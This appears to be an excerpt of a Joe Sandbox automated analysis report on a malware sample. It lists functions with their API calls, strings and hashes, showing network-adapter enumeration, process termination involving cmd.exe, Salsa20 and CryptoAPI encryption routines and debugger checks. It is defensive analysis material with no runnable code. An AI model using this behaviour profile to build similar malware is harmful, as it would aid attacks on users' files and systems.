                                                                                                        • Instruction ID: 0d7ed1242274a76aba30caba8daeb12a13f53ab1c34ea6166f3009310c9bb19b
                                                                                                        • Opcode Fuzzy Hash: 684620563bc5b44aa0d83f42002806d38948cb47d6e6cd66d8aed70ec6dd0f52
                                                                                                        • Instruction Fuzzy Hash: EC41D631944304ABE710AB759C4AF2FBBF9FF89710F00051AFA94D62A1D7769800DBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F1E67F
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: HeapAlloc.KERNEL32(00C00000,00000000,00000001,?,?,?,?,00F33B69,?), ref: 00F30CA5
                                                                                                        • _malloc.LIBCMT ref: 00F1E68B
                                                                                                        • _wprintf.LIBCMT ref: 00F1E69E
                                                                                                        • _free.LIBCMT ref: 00F1E6A4
                                                                                                          • Part of subcall function 00F30BED: HeapFree.KERNEL32(00000000,00000000,?,00F3507F,00000000,00F3520D,00F30CE9), ref: 00F30C01
                                                                                                          • Part of subcall function 00F30BED: GetLastError.KERNEL32(00000000,?,00F3507F,00000000,00F3520D,00F30CE9), ref: 00F30C13
                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00F1E6B9
                                                                                                        • _free.LIBCMT ref: 00F1E6C5
                                                                                                        • _malloc.LIBCMT ref: 00F1E6CD
                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00F1E6E0
                                                                                                        • _sprintf.LIBCMT ref: 00F1E720
                                                                                                        • _wprintf.LIBCMT ref: 00F1E732
                                                                                                        • _wprintf.LIBCMT ref: 00F1E73C
                                                                                                        • _free.LIBCMT ref: 00F1E745
                                                                                                        Strings
                                                                                                        • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 00F1E71A
                                                                                                        • Error allocating memory needed to call GetAdaptersinfo, xrefs: 00F1E699
                                                                                                        • Address: %s, mac: %s, xrefs: 00F1E72D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocErrorFreeLast_sprintf
                                                                                                        • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                        • API String ID: 473631332-1604013687
                                                                                                        • Opcode ID: 2b7cb3c81c667e2156f85e0907cccd429141eb933b4fb74faebaffc2a0071c88
                                                                                                        • Instruction ID: 7c93f966713febd6f43837ff1c67571cdba138d5d79d14714c1f8548c3f89b77
                                                                                                        • Opcode Fuzzy Hash: 2b7cb3c81c667e2156f85e0907cccd429141eb933b4fb74faebaffc2a0071c88
                                                                                                        • Instruction Fuzzy Hash: 411106B29045587AD272A3B55C12EFF76EC8F46761F08016AFECCD5141EA5C5A01B3B1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F20160 Relevance: 26.2, APIs: 17, Instructions: 660COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F21AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21ACA
                                                                                                          • Part of subcall function 00F21AB0: DispatchMessageW.USER32(?), ref: 00F21AE0
                                                                                                          • Part of subcall function 00F21AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F21AEE
                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00F20346
                                                                                                        • _memmove.LIBCMT ref: 00F20427
                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 00F2048E
                                                                                                        • _memmove.LIBCMT ref: 00F20514
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                        • String ID:
                                                                                                        • API String ID: 273148273-0
                                                                                                        • Opcode ID: 72be00791f2f2c6e05b4968a77bdc7ca1bf8c07d038122a66fbbf202a2b028d1
                                                                                                        • Instruction ID: 788a37fd46c2731d6ebc63c7f8c1377b0694359d7d344446144fdcaa114972bf
                                                                                                        • Opcode Fuzzy Hash: 72be00791f2f2c6e05b4968a77bdc7ca1bf8c07d038122a66fbbf202a2b028d1
                                                                                                        • Instruction Fuzzy Hash: 9E42AB72D00228DBDF10EFA4DC85BEEB7F5BF04308F244169E405A7252EB75AA45DBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3232302685-0
                                                                                                        • Opcode ID: a236c2b7f7bc279c4751a13025b5b54209956b028c02603671379d23f02120ff
                                                                                                        • Instruction ID: ba34a8ae6d03209255882d96c0aee3f65dc5c4c5cb6e0c7a9d981bdedc1ca409
                                                                                                        • Opcode Fuzzy Hash: a236c2b7f7bc279c4751a13025b5b54209956b028c02603671379d23f02120ff
                                                                                                        • Instruction Fuzzy Hash: 0AB1CD71D00219DBDF20DFA4DC45BEEB7B5BF14318F104069E409AB252EB359A89EF92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F22440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00F2244F
                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00F22469
                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F224A1
                                                                                                        • TerminateProcess.KERNEL32(00000000,00000009), ref: 00F224B0
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F224B7
                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00F224C1
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F224CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                        • String ID: cmd.exe
                                                                                                        • API String ID: 2696918072-723907552
                                                                                                        • Opcode ID: 5b5289c0772047087c1fcac2e19ae2af5b390dd679cecab2b9cc3967b962dea1
                                                                                                        • Instruction ID: 74b34f0a560826bd86cc79d57ea010983a12cc4df81550bf31f7137bc438e688
                                                                                                        • Opcode Fuzzy Hash: 5b5289c0772047087c1fcac2e19ae2af5b390dd679cecab2b9cc3967b962dea1
                                                                                                        • Instruction Fuzzy Hash: D401963290222A7BD720A7B1BC4DFAF776CDB04715F000152FD08D2142E66499409AE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F482A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _wcscmp.LIBCMT ref: 00F482B9
                                                                                                        • _wcscmp.LIBCMT ref: 00F482CA
                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00F48568,?,00000000), ref: 00F482E6
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00F48568,?,00000000), ref: 00F48310
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale_wcscmp
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 1351282208-711371036
                                                                                                        • Opcode ID: faf33b4fde292ef0379bda4de5632ae41479b707e3961a7339c999803269385d
                                                                                                        • Instruction ID: 3ecd29be6da16623616787b7b7761200d1883f053bb28d77389b1014961c3548
                                                                                                        • Opcode Fuzzy Hash: faf33b4fde292ef0379bda4de5632ae41479b707e3961a7339c999803269385d
                                                                                                        • Instruction Fuzzy Hash: 9B014431A05616AAD7119E58DC45FDE3F99AB05BA5F008015FE04DA051FFB0DB42F7D4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F11000 Relevance: 7.6, Strings: 6, Instructions: 119COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Auth$Genu$cAMD$enti$ineI$ntel
                                                                                                        • API String ID: 0-1714976780
                                                                                                        • Opcode ID: 5f5d6626ad0f6917a330496c5e5681d55bc31fb8fcfe0306b7157049ee0a44b3
                                                                                                        • Instruction ID: 0c34452620d071a1332fde5264ad32c9c1a5bd6aa2c77dfb71082b2f59032e1c
                                                                                                        • Opcode Fuzzy Hash: 5f5d6626ad0f6917a330496c5e5681d55bc31fb8fcfe0306b7157049ee0a44b3
                                                                                                        • Instruction Fuzzy Hash: 92317837F204560AFB7858788C453FD608BA395370F3AC739D326D35C4E8698DC16250
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • input != nullptr && output != nullptr, xrefs: 00F1C095
                                                                                                        • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 00F1C090
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __wassert
                                                                                                        • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                        • API String ID: 3993402318-1975116136
                                                                                                        • Opcode ID: 3ae4ddc2b7fa20cd13afabebd1a95491edd6d3546f55db01dd4af2da2fb07ac2
                                                                                                        • Instruction ID: de06a94da523d87b2abf2ff87c6902075d69443e2c982f1015c6f4912b0a6f63
                                                                                                        • Opcode Fuzzy Hash: 3ae4ddc2b7fa20cd13afabebd1a95491edd6d3546f55db01dd4af2da2fb07ac2
                                                                                                        • Instruction Fuzzy Hash: 97C18E75E003499FCB54CFA9C885ADEFBF1FF48310F24856AE919E7201E334AA558B94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F34168 Relevance: 3.1, APIs: 2, Instructions: 72COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F3419D
                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00F34252
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DebuggerPresent_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2328436684-0
                                                                                                        • Opcode ID: 1c1a324ed063c43814c724499d9cf879cb9d6eb601617b98199e169bcbc06d50
                                                                                                        • Instruction ID: 63cb8e3674c411a1709f1ff37d6c27f5b000a025a8369590b94f9ab9528dc73f
                                                                                                        • Opcode Fuzzy Hash: 1c1a324ed063c43814c724499d9cf879cb9d6eb601617b98199e169bcbc06d50
                                                                                                        • Instruction Fuzzy Hash: 5A31D67491122C9BCB61DF64D8887CDBBB8BF08320F5042EAE80CA6251E7349F859F44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F21178 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 00F21190
                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00F211A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 3989222877-0
                                                                                                        • Opcode ID: 0b587fb3b08703bac70ef91934140a3642d16b80a3c9206093886a340e2ee2b2
                                                                                                        • Instruction ID: 0a6fa39255ae4f37825ceda80ad1e208a7200d5c5cebb64f41dc43e7dbaedc06
                                                                                                        • Opcode Fuzzy Hash: 0b587fb3b08703bac70ef91934140a3642d16b80a3c9206093886a340e2ee2b2
                                                                                                        • Instruction Fuzzy Hash: 2AE0EC74F0031A97EF109A75AC49B6A77AC7B24755F044521FA00E6240D638D810E564
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1EA51 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 00F1EA69
                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00F1EA79
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 3989222877-0
                                                                                                        • Opcode ID: b5d42ae59331136ba991d49b41589e8fcd9c9e5c679b011c8458663705e81f74
                                                                                                        • Instruction ID: 2b9dd91e1df09eba7142376eea4cf72636f2534e5ba2e0ede370111fe7e616e8
                                                                                                        • Opcode Fuzzy Hash: b5d42ae59331136ba991d49b41589e8fcd9c9e5c679b011c8458663705e81f74
                                                                                                        • Instruction Fuzzy Hash: E6E04C78F4020697DF50DB759C49B9A77AC7F18755F444414FC05E2245D62CE940E561
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1EC68 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 00F1EC80
                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00F1EC90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 3989222877-0
                                                                                                        • Opcode ID: 66519f71dd7493d64f4f1970a88a182d284746184cecee6b4a4accaaa600de30
                                                                                                        • Instruction ID: d0dd12537f013387db9316c8e9dc5890becb6fbf8aed4d6289fbbd51c98f34eb
                                                                                                        • Opcode Fuzzy Hash: 66519f71dd7493d64f4f1970a88a182d284746184cecee6b4a4accaaa600de30
                                                                                                        • Instruction Fuzzy Hash: FFE04CB4F0030697DF60DA759D49BAB77A86B04755F444414FD05E2241D628D840E6A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F429EC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F34266,?,?,?,00000001), ref: 00F429F1
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00F429FA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID:
                                                                                                        • API String ID: 3192549508-0
